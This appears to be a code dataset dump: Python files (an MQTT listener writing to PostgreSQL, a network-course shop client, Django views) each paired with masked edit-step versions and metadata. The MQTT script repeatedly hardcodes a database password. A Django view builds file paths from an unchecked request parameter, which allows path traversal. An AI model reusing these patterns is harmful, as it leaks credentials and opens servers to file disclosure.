* count\n total_test_variance += test_variance * count\n \n #~~~~calculate against baseline~~~~~~~~~~~\n \n # Xy = np.array(allDumbData) -----------------------------------\n # np.random.shuffle(Xy) ----------------------------------------\n # X = Xy[ :, range(0, Xy.shape[1]-1) ] -------------------------\n # y = Xy[ :, Xy.shape[1]-1 ] -----------------------------------\n# -----------------------------------------------------------------------------\n # X_normalized = (X) -------------------------------------------\n# -----------------------------------------------------------------------------\n # # Separate into Train and Test datasets ----------------------\n # train_test_split = int(round(len(y) * 0.7)) ------------------\n # X_normalized_train = X_normalized[:train_test_split] ---------\n # X_normalized_test = X_normalized[train_test_split:] 
----------\n # y_train = y[:train_test_split] -------------------------------\n # y_test = y[train_test_split:] --------------------------------\n# -----------------------------------------------------------------------------\n # regr = linear_model.LinearRegression(fit_intercept=True) -----\n # regr.fit(X_normalized_train, y_train) ------------------------\n# -----------------------------------------------------------------------------\n # # Error Analysis ---------------------------------------------\n # train_error = np.mean((regr.predict(X_normalized_train) - y_train) ** 2) \n # train_variance = regr.score(X_normalized_train, y_train) -----\n # test_error = np.mean((regr.predict(X_normalized_test) - y_test) ** 2) \n # test_variance = regr.score(X_normalized_test, y_test) --------\n # # print(\"Residual sum of squares for training set: %.2f\" % train_error) ---- \n # # print('Variance score: %.2f' % train_variance) --------------------------- \n # # print(\"Residual sum of squares for dumb test set: %.2f\" % test_error) \n # # print('Variance score for dumb test set: %.2f' % test_variance) -- \n # dumb_total_train_error += train_error * count ----------------\n # dumb_total_train_variance += train_variance * count ----------\n # dumb_total_test_error += test_error * count ------------------\n # dumb_total_test_variance += test_variance * count ------------\n \n total_train_error = total_train_error / total_count\n total_train_variance = total_train_variance / total_count\n total_test_error = total_test_error / total_count\n total_test_variance = total_test_variance / total_count\n # dumb_total_train_error = dumb_total_train_error / total_count ------------\n # dumb_total_train_variance = dumb_total_train_variance / total_count ------\n # dumb_total_test_error = dumb_total_test_error / total_count --------------\n # dumb_total_test_variance = dumb_total_test_variance / total_count --------\n print(\"alpha-value: %.2f\" % k)\n print(\"total_train_error: %.2f\" % 
total_train_error)\n print(\"total_train_variance: %.2f\" % total_train_variance)\n print(\"total_test_error: %.2f\" % total_test_error)\n print(\"total_test_variance: %.2f\" % total_test_variance)\n # print(\"dumb_total_train_error: %.2f\" % dumb_total_train_error) -----------\n # print(\"dumb_total_train_variance: %.2f\" % dumb_total_train_variance) -----\n # print(\"dumb_total_test_error: %.2f\" % dumb_total_test_error) -------------\n # print(\"dumb_total_test_variance: %.2f\" % dumb_total_test_variance) -------\n # print(\"total_count: %d\" % (total_count / ITERATIONS)) --------------------\n \n if (total_test_error < best_error):\n best_error = total_test_error\n best_k = k\n \n# Calculate against baseline ---------------------------------------------------\ncursor = db.playtime_model.find({\"AVG_MIN\": {\"$gt\": MINUTE_RESTRICTION}})\nbaseline_error = 0.0\ncount = 0\nfor document in cursor:\n baseline_error += (document['AVG_MIN'] - document['MIN'])**2\n count += 1\nbaseline_error = baseline_error / count\nprint(\"baseline error: %.2f\" % baseline_error)\nprint(\"best error: %.2f, best alpha: %.2f\" % (best_error, best_k))",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import ssl
import sys
import psycopg2 #conectarte python con postresql
import paho.mqtt.client #pip install paho-mqtt
import json
conn = psycopg2.connect(host = 'raja.db.elephantsql.com', user= 'oyoqynnr', password ='myHVlpJkEO21o29GKYSvMCGI3g4y05bh', dbname= 'oyoqynnr')
def on_connect(client, userdata, flags, rc):
print('Conectado (%s)' % client._client_id)
client.subscribe(topic='unimet/#', qos = 0)
def ventasTIENDA(client, userdata, message):
a = json.loads(message.payload)
print(a)
cur = conn.cursor()
sql = '''INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'''
cur.execute(sql, (a["DATE"],a["ID_TIENDA"],a["MAC_ADD"],a["MONTO"]))
conn.commit()
print('VENTA EFECTUADA')
print('------------------------------')
def main():
client = paho.mqtt.client.Client()
client.on_connect = on_connect
client.message_callback_add('unimet/ventas', ventasTIENDA)
client.connect("broker.hivemq.com",1883,60)
client.loop_forever()
if __name__ == '__main__':
main()
sys.exit(0)
|
normal
|
{
"blob_id": "f1b36e3ce3189c8dca2e41664ac1a6d632d23f79",
"index": 5078,
"step-1": "<mask token>\n\n\ndef on_connect(client, userdata, flags, rc):\n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos=0)\n\n\ndef ventasTIENDA(client, userdata, message):\n a = json.loads(message.payload)\n print(a)\n cur = conn.cursor()\n sql = (\n 'INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'\n )\n cur.execute(sql, (a['DATE'], a['ID_TIENDA'], a['MAC_ADD'], a['MONTO']))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------')\n\n\ndef main():\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect('broker.hivemq.com', 1883, 60)\n client.loop_forever()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef on_connect(client, userdata, flags, rc):\n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos=0)\n\n\ndef ventasTIENDA(client, userdata, message):\n a = json.loads(message.payload)\n print(a)\n cur = conn.cursor()\n sql = (\n 'INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'\n )\n cur.execute(sql, (a['DATE'], a['ID_TIENDA'], a['MAC_ADD'], a['MONTO']))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------')\n\n\ndef main():\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect('broker.hivemq.com', 1883, 60)\n client.loop_forever()\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n",
"step-3": "<mask token>\nconn = psycopg2.connect(host='raja.db.elephantsql.com', user='oyoqynnr',\n password='myHVlpJkEO21o29GKYSvMCGI3g4y05bh', dbname='oyoqynnr')\n\n\ndef on_connect(client, userdata, flags, rc):\n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos=0)\n\n\ndef ventasTIENDA(client, userdata, message):\n a = json.loads(message.payload)\n print(a)\n cur = conn.cursor()\n sql = (\n 'INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'\n )\n cur.execute(sql, (a['DATE'], a['ID_TIENDA'], a['MAC_ADD'], a['MONTO']))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------')\n\n\ndef main():\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect('broker.hivemq.com', 1883, 60)\n client.loop_forever()\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n",
"step-4": "import ssl\nimport sys\nimport psycopg2\nimport paho.mqtt.client\nimport json\nconn = psycopg2.connect(host='raja.db.elephantsql.com', user='oyoqynnr',\n password='myHVlpJkEO21o29GKYSvMCGI3g4y05bh', dbname='oyoqynnr')\n\n\ndef on_connect(client, userdata, flags, rc):\n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos=0)\n\n\ndef ventasTIENDA(client, userdata, message):\n a = json.loads(message.payload)\n print(a)\n cur = conn.cursor()\n sql = (\n 'INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'\n )\n cur.execute(sql, (a['DATE'], a['ID_TIENDA'], a['MAC_ADD'], a['MONTO']))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------')\n\n\ndef main():\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect('broker.hivemq.com', 1883, 60)\n client.loop_forever()\n\n\nif __name__ == '__main__':\n main()\n sys.exit(0)\n",
"step-5": "import ssl\nimport sys\nimport psycopg2 #conectarte python con postresql\nimport paho.mqtt.client #pip install paho-mqtt\nimport json\n\nconn = psycopg2.connect(host = 'raja.db.elephantsql.com', user= 'oyoqynnr', password ='myHVlpJkEO21o29GKYSvMCGI3g4y05bh', dbname= 'oyoqynnr')\n\n \ndef on_connect(client, userdata, flags, rc): \n print('Conectado (%s)' % client._client_id)\n client.subscribe(topic='unimet/#', qos = 0) \n\n\ndef ventasTIENDA(client, userdata, message): \n a = json.loads(message.payload) \n print(a) \n cur = conn.cursor()\n sql = '''INSERT INTO ventas (time_stamp, id_tienda, mac_add, monto) VALUES ( %s, %s, %s, %s);'''\n cur.execute(sql, (a[\"DATE\"],a[\"ID_TIENDA\"],a[\"MAC_ADD\"],a[\"MONTO\"]))\n conn.commit()\n print('VENTA EFECTUADA')\n print('------------------------------') \n\n\n\n\ndef main():\t\n client = paho.mqtt.client.Client()\n client.on_connect = on_connect\n client.message_callback_add('unimet/ventas', ventasTIENDA)\n client.connect(\"broker.hivemq.com\",1883,60)\n client.loop_forever()\n\nif __name__ == '__main__':\n\tmain()\n\tsys.exit(0)\n\n\n\n",
"step-ids": [
3,
4,
5,
6,
7
]
}
|
[
3,
4,
5,
6,
7
] |
from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney
from netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport
from netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient
import asyncio
import playground
import random, logging
from playground import getConnector
from playground.network.packet import PacketType
from playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER
from playground.network.packet.fieldtypes.attributes import Optional
from playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport
import zlib
import sys
class ShopClientProtocol(asyncio.Protocol):
clientstate = 0
def __init__(self, loop):
#self.loop = loop
self.transport = None
self.loop = loop
self.deserializer = PacketType.Deserializer()
def connection_made(self, transport):
print("ShopClient connection_made is called\n")
self.transport = transport
# PACKET 1 - Request to Buy packet
startbuy = RequestToBuy()
print("Sending Request to Buy")
self.transport.write(startbuy.__serialize__())
def data_received(self, data):
print("ShopClient Data_received is called")
self.deserializer.update(data)
#print(data)
for pkt in self.deserializer.nextPackets():
#print("Client <------------{}------------- Server".format(pkt.DEFINITION_IDENTIFIER))
if isinstance(pkt, RequestItem) and self.clientstate == 0:
self.clientstate += 1
# PACKET 3 - Send Item packet
item = "Butter"
response = SendItem()
response.Item = item
print("Sent SendItem")
self.transport.write(response.__serialize__())
elif isinstance(pkt, RequestMoney) and self.clientstate == 1:
self.clientstate += 1
# PACKET 5 - Send Money packet
response = SendMoney()
response.Cash = pkt.Amount
print("Sent SendMoney")
self.transport.write(response.__serialize__())
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:
self.transport.close()
else:
print(pkt.Type)
print("Client Received Incorrect Packet. Closing Connection. Try Again!")
self.transport.close()
def connection_lost(self,exc):
print('\nThe ShopServer sent a connection close to the client')
self.transport.close()
self.transport = None
self.loop.stop()
class initiate():
#1
def __init__(self, loop):
self.loop = loop
def send_first_packet(self):
self.loop = loop
return ShopClientProtocol(loop)
if __name__ == "__main__":
loop = asyncio.get_event_loop()
#logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*
#logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr
f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))
ptConnector = playground.Connector(protocolStack=f)
playground.setConnector("passthrough", ptConnector)
go = initiate(loop)
coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)
client = loop.run_until_complete(coro)
# Serve requests until Ctrl+C is pressed
try:
loop.run_forever()
except KeyboardInterrupt:
pass
# Close the server
loop.close()
|
normal
|
{
"blob_id": "a12f9435eb4b090bc73be14ad64fdf43c5caa4d2",
"index": 7471,
"step-1": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n <mask token>\n <mask token>\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n <mask token>\n <mask token>\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n clientstate = 0\n\n def __init__(self, loop):\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print('ShopClient connection_made is called\\n')\n self.transport = transport\n startbuy = RequestToBuy()\n print('Sending Request to Buy')\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print('ShopClient Data_received is called')\n self.deserializer.update(data)\n for pkt in self.deserializer.nextPackets():\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n item = 'Butter'\n response = SendItem()\n response.Item = item\n print('Sent SendItem')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n response = SendMoney()\n response.Cash = pkt.Amount\n print('Sent SendMoney')\n self.transport.write(response.__serialize__())\n elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n self.transport.close()\n else:\n print(pkt.Type)\n print(\n 'Client Received Incorrect Packet. Closing Connection. 
Try Again!'\n )\n self.transport.close()\n\n def connection_lost(self, exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate:\n\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\n\nif __name__ == '__main__':\n loop = asyncio.get_event_loop()\n f = StackingProtocolFactory(lambda : PLSClient(), lambda : PEEPClient(loop)\n )\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector('passthrough', ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(\n go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n loop.close()\n",
"step-5": "from netsec_2017.Lab_3.packets import RequestItem, RequestMoney, RequestToBuy, FinishTransaction, SendItem, SendMoney\nfrom netsec_2017.Lab_3.PLS.client import PLSClient, PLSStackingTransport\nfrom netsec_2017.Lab_3.peepTCP import PeepClientTransport, PEEPClient\nimport asyncio\nimport playground\nimport random, logging\nfrom playground import getConnector\nfrom playground.network.packet import PacketType\nfrom playground.network.packet.fieldtypes import UINT32, STRING, UINT16, UINT8, BUFFER\nfrom playground.network.packet.fieldtypes.attributes import Optional\nfrom playground.network.common.Protocol import StackingProtocol, StackingProtocolFactory, StackingTransport\nimport zlib\nimport sys\n\n\nclass ShopClientProtocol(asyncio.Protocol):\n\n clientstate = 0\n\n def __init__(self, loop):\n #self.loop = loop\n self.transport = None\n self.loop = loop\n self.deserializer = PacketType.Deserializer()\n\n def connection_made(self, transport):\n print(\"ShopClient connection_made is called\\n\")\n self.transport = transport\n # PACKET 1 - Request to Buy packet\n startbuy = RequestToBuy()\n print(\"Sending Request to Buy\")\n self.transport.write(startbuy.__serialize__())\n\n def data_received(self, data):\n print(\"ShopClient Data_received is called\")\n self.deserializer.update(data)\n #print(data)\n for pkt in self.deserializer.nextPackets():\n #print(\"Client <------------{}------------- Server\".format(pkt.DEFINITION_IDENTIFIER))\n\n if isinstance(pkt, RequestItem) and self.clientstate == 0:\n self.clientstate += 1\n\n # PACKET 3 - Send Item packet\n item = \"Butter\"\n response = SendItem()\n response.Item = item\n\n print(\"Sent SendItem\")\n self.transport.write(response.__serialize__())\n\n\n elif isinstance(pkt, RequestMoney) and self.clientstate == 1:\n self.clientstate += 1\n\n # PACKET 5 - Send Money packet\n response = SendMoney()\n\n response.Cash = pkt.Amount\n\n print(\"Sent SendMoney\")\n self.transport.write(response.__serialize__())\n\n 
elif isinstance(pkt, FinishTransaction) and self.clientstate == 2:\n\n self.transport.close()\n\n else:\n print(pkt.Type)\n print(\"Client Received Incorrect Packet. Closing Connection. Try Again!\")\n self.transport.close()\n\n\n def connection_lost(self,exc):\n print('\\nThe ShopServer sent a connection close to the client')\n self.transport.close()\n self.transport = None\n self.loop.stop()\n\n\nclass initiate():\n #1\n def __init__(self, loop):\n self.loop = loop\n\n def send_first_packet(self):\n self.loop = loop\n return ShopClientProtocol(loop)\n\nif __name__ == \"__main__\":\n\n loop = asyncio.get_event_loop()\n\n #logging.getLogger().setLevel(logging.NOTSET) # this logs *everything*\n #logging.getLogger().addHandler(logging.StreamHandler()) # logs to stderr\n\n f = StackingProtocolFactory(lambda:PLSClient(), lambda: PEEPClient(loop))\n ptConnector = playground.Connector(protocolStack=f)\n playground.setConnector(\"passthrough\", ptConnector)\n go = initiate(loop)\n coro = playground.getConnector('passthrough').create_playground_connection(go.send_first_packet, '20174.1.1.1', 8888)\n client = loop.run_until_complete(coro)\n # Serve requests until Ctrl+C is pressed\n try:\n loop.run_forever()\n except KeyboardInterrupt:\n pass\n\n # Close the server\n loop.close()\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
from django.shortcuts import render
import codecs
import os.path
from django.conf import settings
OFFSET = 20
def show_raw_data(req):
filename = req.GET['file']
lineno = int(req.GET['line'])
from_lineno = max(0, lineno - OFFSET)
to_lineno = (lineno + OFFSET)
ctx = dict()
cur_lineno = 1
lines = []
file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' % filename)
with codecs.open(file_path, encoding="windows-1255") as fh:
for line in fh:
if cur_lineno >= from_lineno and cur_lineno <= to_lineno:
lines.append({'lineno': cur_lineno,
'line': line.strip().encode('utf-8', errors='ignore')})
cur_lineno += 1
ctx['lines'] = lines
ctx['filename'] = filename
ctx['lineno'] = lineno
ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET * 2 - 1)
ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET * 2 + 1)
return render(req, 'data/raw_data.html', ctx)
def show_results_from_to(req):
return render(req, 'data/show_results.html', {'title': 'From To',
'app' : 'FromTo'})
def show_trip(req):
return render(req,'data/show_results.html',{'title' : 'Show Trip',
'app' : 'ShowTrip'})
def show_routes(req):
return render(req,'data/show_results.html',{'title': 'Show Routes',
'app': 'ShowRoutes'})
def route_explorer(req):
return render(req, 'ui/RouteExplorer.html')
|
normal
|
{
"blob_id": "576c28bb32b5e0b2b5a82a33cee73e3080dcf3ab",
"index": 1737,
"step-1": "<mask token>\n\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = lineno + OFFSET\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' %\n filename)\n with codecs.open(file_path, encoding='windows-1255') as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno, 'line': line.strip().\n encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET *\n 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET *\n 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To', 'app':\n 'FromTo'})\n\n\n<mask token>\n\n\ndef show_routes(req):\n return render(req, 'data/show_results.html', {'title': 'Show Routes',\n 'app': 'ShowRoutes'})\n\n\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-2": "<mask token>\n\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = lineno + OFFSET\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' %\n filename)\n with codecs.open(file_path, encoding='windows-1255') as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno, 'line': line.strip().\n encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET *\n 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET *\n 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To', 'app':\n 'FromTo'})\n\n\ndef show_trip(req):\n return render(req, 'data/show_results.html', {'title': 'Show Trip',\n 'app': 'ShowTrip'})\n\n\ndef show_routes(req):\n return render(req, 'data/show_results.html', {'title': 'Show Routes',\n 'app': 'ShowRoutes'})\n\n\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-3": "<mask token>\nOFFSET = 20\n\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = lineno + OFFSET\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' %\n filename)\n with codecs.open(file_path, encoding='windows-1255') as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno, 'line': line.strip().\n encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET *\n 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET *\n 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To', 'app':\n 'FromTo'})\n\n\ndef show_trip(req):\n return render(req, 'data/show_results.html', {'title': 'Show Trip',\n 'app': 'ShowTrip'})\n\n\ndef show_routes(req):\n return render(req, 'data/show_results.html', {'title': 'Show Routes',\n 'app': 'ShowRoutes'})\n\n\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-4": "from django.shortcuts import render\nimport codecs\nimport os.path\nfrom django.conf import settings\nOFFSET = 20\n\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = lineno + OFFSET\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' %\n filename)\n with codecs.open(file_path, encoding='windows-1255') as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno, 'line': line.strip().\n encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET *\n 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET *\n 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To', 'app':\n 'FromTo'})\n\n\ndef show_trip(req):\n return render(req, 'data/show_results.html', {'title': 'Show Trip',\n 'app': 'ShowTrip'})\n\n\ndef show_routes(req):\n return render(req, 'data/show_results.html', {'title': 'Show Routes',\n 'app': 'ShowRoutes'})\n\n\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-5": "from django.shortcuts import render\nimport codecs\nimport os.path\nfrom django.conf import settings\n\nOFFSET = 20\n\ndef show_raw_data(req):\n filename = req.GET['file']\n lineno = int(req.GET['line'])\n from_lineno = max(0, lineno - OFFSET)\n to_lineno = (lineno + OFFSET)\n ctx = dict()\n cur_lineno = 1\n lines = []\n file_path = os.path.join(settings.BASE_DIR, 'parser/unzip_data/%s' % filename)\n with codecs.open(file_path, encoding=\"windows-1255\") as fh:\n for line in fh:\n if cur_lineno >= from_lineno and cur_lineno <= to_lineno:\n lines.append({'lineno': cur_lineno,\n 'line': line.strip().encode('utf-8', errors='ignore')})\n cur_lineno += 1\n ctx['lines'] = lines\n ctx['filename'] = filename\n ctx['lineno'] = lineno\n ctx['prev'] = '/raw-data?file=%s&line=%s' % (filename, lineno - OFFSET * 2 - 1)\n ctx['next'] = '/raw-data?file=%s&line=%s' % (filename, lineno + OFFSET * 2 + 1)\n return render(req, 'data/raw_data.html', ctx)\n\n\ndef show_results_from_to(req):\n return render(req, 'data/show_results.html', {'title': 'From To',\n 'app' : 'FromTo'})\n\ndef show_trip(req):\n return render(req,'data/show_results.html',{'title' : 'Show Trip',\n 'app' : 'ShowTrip'})\n\ndef show_routes(req):\n return render(req,'data/show_results.html',{'title': 'Show Routes',\n 'app': 'ShowRoutes'})\ndef route_explorer(req):\n return render(req, 'ui/RouteExplorer.html')\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
from django.db import transaction
from django.forms import inlineformset_factory
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import CreateView, UpdateView
from forms.models.fund_operation import FundOperation
from forms.forms.fund_operation_forms import FundOperationForm, FundOperationLineForm, FundOperationFormSet
class FundOperationCreateView(CreateView):
model = FundOperation
template_name = "forms/fund_operation/create.html"
form_class = FundOperationForm
success_url = None
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
if self.request.POST:
data['lines'] = FundOperationFormSet(self.request.POST)
else:
data['lines'] = FundOperationFormSet()
return data
def form_valid(self, form):
context = self.get_context_data()
lines = context['lines']
with transaction.atomic():
form.instance.create_user = self.request.user
self.object = form.save()
if lines.is_valid():
lines.instance = self.object
lines.save()
return super().form_valid(form)
def get_success_url(self):
return reverse_lazy('fund_operation:fund_operation_create')
class FundOperationUpdateView(UpdateView):
    """Edit a FundOperation together with its inline line-item formset.

    When the instance has no lines yet, the formset is pre-seeded with a
    fixed list of funding bodies (labels are in Nepali).
    """
    model =FundOperation
    template_name = "forms/fund_operation/update.html"
    form_class = FundOperationForm
    success_url = None  # resolved per-object in get_success_url()
    def _get_initial_data(self):
        """Return seed rows for the line formset, or None when the
        instance already has lines (existing data wins over defaults)."""
        if self.object.lines.all():
            return None
        # Default funding bodies used to pre-populate an empty formset.
        initial = [
            {
                'body': 'प्रदेश सरकार',
            },
            {
                'body': 'संघीय सरकार',
            },
            {
                'body': 'स्थानीय तह',
            },
            {
